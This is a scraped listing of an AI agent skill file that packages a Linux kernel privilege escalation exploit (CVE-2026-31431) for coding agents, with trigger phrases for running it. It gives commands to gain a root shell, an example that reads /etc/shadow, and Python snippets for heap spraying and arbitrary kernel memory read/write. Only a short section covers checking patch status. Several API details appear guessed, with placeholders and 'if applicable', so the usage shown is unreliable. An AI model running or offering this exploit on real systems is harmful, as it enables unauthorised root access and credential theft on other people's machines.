aradotso/skills/copy-fail-cve-2026-31431
skills/copy-fail-cve-2026-31431/SKILL.md
```markdown --- name: copy-fail-cve-2026-31431 description: Linux kernel local privilege escalation exploit (CVE-2026-31431) discovered by Theori's Xint Code, targeting a 9-year-old vulnerability in the Linux copy subsystem triggers: - exploit CVE-2026-31431 - copy fail linux privilege escalation - linux kernel LPE exploit - run copy fail exploit - privilege escalation linux kernel 2026 - theori xint code exploit - CVE-2026-31431 poc - linux kernel local root exploit --- # Copy
$ install --global
skillsauthnpx skillsauth add aradotso/trending-skills skills/copy-fail-cve-2026-31431Install this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: May 6, 2026, 3:12 AM155.8s1 file scanned
SKILL.md
---
name: copy-fail-cve-2026-31431
description: Linux kernel local privilege escalation exploit (CVE-2026-31431) discovered by Theori's Xint Code, targeting a 9-year-old vulnerability in the Linux copy subsystem
triggers:
- exploit CVE-2026-31431
- copy fail linux privilege escalation
- linux kernel LPE exploit
- run copy fail exploit
- privilege escalation linux kernel 2026
- theori xint code exploit
- CVE-2026-31431 poc
- linux kernel local root exploit
---
# Copy Fail - CVE-2026-31431
> Skill by [ara.so](https://ara.so) — Daily 2026 Skills collection.
## Overview
**Copy Fail** (CVE-2026-31431) is a local privilege escalation (LPE) vulnerability in the Linux kernel discovered by Theori's Xint Code. The bug has existed for approximately 9 years and affects a wide range of Linux distributions. This repository contains a proof-of-concept exploit written in Python, along with supporting tooling for research and testing purposes.
> ⚠️ **Legal Notice**: This exploit is for **authorized security research, penetration testing, and educational purposes only**. Use only on systems you own or have explicit written permission to test.
**Affected Kernels / Distros:**
| Distro | Version |
|-------------------|----------------------------|
| Ubuntu 24.04 LTS | 6.17.0-1007-aws |
| Amazon Linux 2023 | 6.18.8-9.213.amzn2023 |
| RHEL 10.1 | 6.12.0-124.45.1.el10_1 |
| SUSE 16 | 6.12.0-160000.9-default |
- **Technical writeup**: https://xint.io/blog/copy-fail-linux-distributions
- **CVE**: CVE-2026-31431
- **Language**: Python
- **Stars**: 3151+
---
## Installation
### Prerequisites
- Python 3.10+
- Linux system (see supported distros above)
- gcc / build-essential (for any compiled helper components)
- Root-accessible test environment (VM recommended)
### Clone and Set Up
```bash
git clone https://github.com/theori-io/copy-fail-CVE-2026-31431.git
cd copy-fail-CVE-2026-31431
# Create virtual environment
python3 -m venv venv
source venv/bin/activate
# Install Python dependencies
pip install -r requirements.txt
Optional: Build native helpers (if applicable)
make
# or
gcc -o helper helper.c -lpthread
Project Structure
copy-fail-CVE-2026-31431/
├── exploit.py # Main exploit entry point
├── exploit/
│ ├── __init__.py
│ ├── core.py # Core exploit logic
│ ├── primitives.py # Kernel read/write primitives
│ ├── spray.py # Heap spray utilities
│ └── utils.py # Helper utilities
├── helper.c # Native C helper (compiled separately)
├── requirements.txt
├── Makefile
└── README.md
Basic Usage
Running the Exploit
# Basic run — attempt privilege escalation to root
python3 exploit.py
# Verbose output for debugging
python3 exploit.py --verbose
# Specify a shell to spawn after root is obtained
python3 exploit.py --shell /bin/bash
# Specify a command to run as root
python3 exploit.py --exec "id && cat /etc/shadow"
# Target a specific kernel offset profile
python3 exploit.py --profile ubuntu-24.04-6.17
# List built-in kernel profiles
python3 exploit.py --list-profiles
Python API / Library Usage
Basic Exploit Invocation
from exploit.core import CopyFailExploit
from exploit.utils import get_kernel_version, is_vulnerable
# Check if the current kernel is vulnerable
kernel = get_kernel_version()
print(f"Kernel: {kernel}")
if is_vulnerable(kernel):
print("[+] Kernel appears vulnerable to CVE-2026-31431")
else:
print("[-] Kernel may not be vulnerable or is patched")
# Initialize and run the exploit
exploit = CopyFailExploit(verbose=True)
result = exploit.run()
if result.success:
print(f"[+] Privilege escalation successful! UID: {result.uid}")
else:
print(f"[-] Exploit failed: {result.error}")
Using Kernel Primitives Directly
from exploit.primitives import KernelPrimitives
prims = KernelPrimitives()
# Establish arbitrary read/write after initial corruption
prims.setup()
# Read 8 bytes from a kernel address
value = prims.read64(kernel_addr)
print(f"Value at {hex(kernel_addr)}: {hex(value)}")
# Write 8 bytes to a kernel address
prims.write64(target_addr, new_value)
# Read a range of kernel memory
data = prims.read_bytes(kernel_addr, length=256)
print(data.hex())
Heap Spray Utilities
from exploit.spray import HeapSpray
spray = HeapSpray()
# Allocate controlled objects to shape the slab heap
spray.allocate(count=1000, size=256, data=b"\x41" * 256)
# Free every other allocation to create holes
spray.create_holes(step=2)
# Trigger the vulnerable copy path
spray.trigger_copy_fail()
# Check spray success
if spray.check_overlap():
print("[+] Heap spray successful — objects overlap")
Exploit Configuration
from exploit.core import CopyFailExploit, ExploitConfig
config = ExploitConfig(
verbose=True,
spray_count=2000, # Number of spray objects
retry_limit=5, # Max retries on partial failure
shell="/bin/bash", # Shell to spawn on success
profile="auto", # Auto-detect kernel profile
timeout=30, # Seconds before giving up
)
exploit = CopyFailExploit(config=config)
exploit.run()
Kernel Profile Configuration
Profiles store kernel-specific offsets needed for reliable exploitation.
# profiles/ubuntu_24_04.py (example structure)
PROFILE = {
"name": "ubuntu-24.04-6.17.0-1007-aws",
"offsets": {
"task_struct_cred": 0xA40,
"cred_uid": 0x04,
"cred_gid": 0x08,
"copy_fail_trigger": 0xFFFFFFFF81234567, # placeholder
}
}
from exploit.profiles import load_profile, detect_profile
# Auto-detect current kernel profile
profile = detect_profile()
print(f"Detected profile: {profile['name']}")
# Manually load a profile
profile = load_profile("ubuntu-24.04-6.17")
Common Patterns
Full End-to-End Research Workflow
import subprocess
from exploit.core import CopyFailExploit
from exploit.utils import get_kernel_version, is_vulnerable, dump_system_info
# 1. Gather system information
info = dump_system_info()
print(info)
# 2. Vulnerability check
kernel = get_kernel_version()
if not is_vulnerable(kernel):
print("System may be patched — check kernel version.")
exit(1)
# 3. Run exploit with logging
exploit = CopyFailExploit(verbose=True, log_file="/tmp/copyfail.log")
result = exploit.run()
# 4. Post-exploitation (research only)
if result.success:
subprocess.run(["id"], check=True)
Running as a Script with Environment Variables
# Override spray count via environment
COPYFAIL_SPRAY_COUNT=3000 python3 exploit.py --verbose
# Set custom profile directory
COPYFAIL_PROFILE_DIR=/opt/profiles python3 exploit.py
# Enable extra kernel debug output
COPYFAIL_DEBUG=1 python3 exploit.py
import os
from exploit.core import CopyFailExploit, ExploitConfig
config = ExploitConfig(
spray_count=int(os.environ.get("COPYFAIL_SPRAY_COUNT", 1000)),
verbose=bool(os.environ.get("COPYFAIL_DEBUG", False)),
profile_dir=os.environ.get("COPYFAIL_PROFILE_DIR", "./profiles"),
)
exploit = CopyFailExploit(config=config)
exploit.run()
Checking Patch Status Programmatically
from exploit.utils import check_patch_status
status = check_patch_status()
print(f"Patched: {status.patched}")
print(f"Kernel: {status.kernel_version}")
print(f"Mitigation: {status.mitigation_detail}")
Troubleshooting
Exploit fails immediately with "profile not found"
# List available profiles
python3 exploit.py --list-profiles
# Force auto-detection
python3 exploit.py --profile auto
# Manually specify kernel version string
python3 exploit.py --profile-kernel "6.17.0-1007-aws"
Heap spray unreliable / exploit not reproducing
# Increase spray count and retries
config = ExploitConfig(
spray_count=5000,
retry_limit=10,
)
# Run with verbose to observe spray progress
python3 exploit.py --verbose --spray-count 5000
Permission denied on /proc or /sys paths
# Some primitives require specific capabilities
# Ensure you're running as unprivileged user (not already root)
whoami
# Check kernel lockdown mode
cat /sys/kernel/security/lockdown
Python dependency errors
pip install --upgrade -r requirements.txt
# If using system Python
python3 -m pip install --user -r requirements.txt
Exploit panics the kernel (kernel oops / crash)
- Use a VM (QEMU, VirtualBox, VMware) for all testing
- Try reducing
--spray-countto lower heap pressure - Ensure the correct kernel profile is selected
- Review
/var/log/kern.logordmesgafter a failed attempt
dmesg | tail -50
journalctl -k | tail -50
Defensive / Patching Guidance
To check if your system is patched:
# Ubuntu / Debian
apt-get changelog linux-image-$(uname -r) | grep -i CVE-2026-31431
# RHEL / Amazon Linux
rpm -q --changelog kernel | grep -i CVE-2026-31431
# General kernel version check
uname -r
Apply kernel updates immediately via your distribution's package manager.
References
- Technical Writeup — Theori/Xint Code
- CVE-2026-31431 NVD Entry
- Theori Security Research
- Xint Code
Related Skills
aradotso/skills/compose-performance-skills
development
VerifiedTrustedCommunity
```markdown --- name: compose-performance-skills description: Install and use the skydoves/compose-performance-skills agent skill library to diagnose and fix Jetpack Compose performance issues including stability, recomposition, lazy layouts, modifiers, side effects, and build configuration. triggers: - "my composable recomposes too often" - "LazyColumn drops frames during scroll" - "diagnose Compose stability issues" - "fix unnecessary recomposition in Jetpack Compose" - "optimize Com
46SKILL.mdUpdated May 5, 2026
aradotso/baguette-ios-simulator
development
VerifiedTrustedCommunity
Headless iOS Simulator manager with host-side HID input injection, 60fps streaming, and device farm web UI for iOS 26
45SKILL.mdUpdated May 4, 2026
aradotso/skills/claude-code-game-studios
development
VerifiedTrustedCommunity
```markdown --- name: claude-code-game-studios description: Turn Claude Code into a full 49-agent game dev studio with 72 workflow skills, automated hooks, and a real studio hierarchy for Godot, Unity, and Unreal projects. triggers: - "set up claude code game studios" - "use ai agents for game development" - "set up game dev studio with claude" - "add game studio agents to my project" - "how do I use claude code for game dev" - "set up godot unity unreal ai workflow" - "49 agents g
43SKILL.mdUpdated May 3, 2026
aradotso/skills/xq-py-quantum-vm
development
VerifiedTrustedCommunity
```markdown --- name: xq-py-quantum-vm description: Python implementation of the Quip Network's quantum virtual machine (xqvm) triggers: - quantum virtual machine python - xqvm quip network - quantum circuit simulation python - xq-py quantum vm - quip network quantum python - simulate quantum gates python - quantum vm xqvm - xqvm-py quantum circuit --- # xq-py Quantum Virtual Machine > Skill by [ara.so](https://ara.so) — Daily 2026 Skills collection. `xqvm-py` is a Python impl
42SKILL.mdUpdated May 2, 2026